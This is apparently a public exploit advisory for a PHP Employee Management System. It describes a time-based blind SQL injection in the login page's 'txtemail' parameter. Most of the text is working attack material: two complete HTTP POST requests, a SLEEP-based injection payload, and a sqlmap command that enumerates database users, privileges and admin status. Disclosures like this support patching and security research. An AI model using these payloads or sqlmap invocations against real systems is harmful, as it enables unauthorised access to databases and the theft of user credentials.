Share
## https://sploitus.com/exploit?id=PACKETSTORM:176685
# Exploit Title: Employee Management System - SQLi  
# Date: 23/03/2024  
# Exploit Author: Özlem Balcı  
# Vendor Homepage: https://www.sourcecodester.com  
# Software Link:  
https://www.sourcecodester.com/php/16999/employee-management-system.html  
# Software Download:  
https://www.sourcecodester.com/download-code?nid=16999&title=Employee+Management+System+using+PHP+and+MySQL  
# Version: 1.0  
# Tested on: Mac OS  
  
## Description  
A Time-Based Blind SQL injection vulnerability in the login page  
(/employee_akpoly/Account/login.php) in Employee Management System allows  
remote unauthenticated attackers to execute remote command through  
arbitrary SQL commands by "txtemail" parameter  
  
## Request PoC  
  
POST /employee_akpoly/Account/login.php HTTP/1.1  
Host: localhost  
Content-Length: 55  
Cache-Control: max-age=0  
sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120"  
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: "macOS"  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36  
(KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36  
Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: http://localhost/employee_akpoly/Account/login.php  
Accept-Encoding: gzip, deflate, br  
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7  
Cookie: PHPSESSID=1af7jipa5jq7ak8ifd09bgtokf  
Connection: close  
  
txtemail=test%40test.com&txtpassword=12345A&E&btnlogin=  
  
This request causes an error. Adding ' AND (SELECT 2092 FROM  
(SELECT(SLEEP(11)))DZSD) AND 'yLcd'='yLcd&txtpassword=123456AE to the end  
of "txtemail" parameter, the response to request was 302 status code with  
message of Found, but 11 seconds later, which indicates that our sleep 11  
command works.  
  
POST /employee_akpoly/Account/login.php HTTP/1.1  
Host: localhost  
Content-Length: 117  
Cache-Control: max-age=0  
sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120"  
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: "macOS"  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36  
(KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36  
Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: http://localhost/employee_akpoly/Account/login.php  
Accept-Encoding: gzip, deflate, br  
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7  
Cookie: PHPSESSID=1af7jipa5jq7ak8ifd09bgtokf  
Connection: close  
  
txtemail=test@test.com' AND (SELECT 2092 FROM (SELECT(SLEEP(11)))DZSD) AND  
'yLcd'='yLcd&txtpassword=123456AE&btnlogin  
  
  
sqlmap -r emp.txt --risk=3 --level=3 --dbms=mysql --is-dba --users  
--privileges --role  
  
Parameter: txtemail (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: txtemail=test@test.com' AND (SELECT 2092 FROM  
(SELECT(SLEEP(5)))DZSD) AND 'yLcd'='yLcd&txtpassword=123456AE&btnlogin=[image:  
Employee Management System 1.png][image: Employee Management System2.png]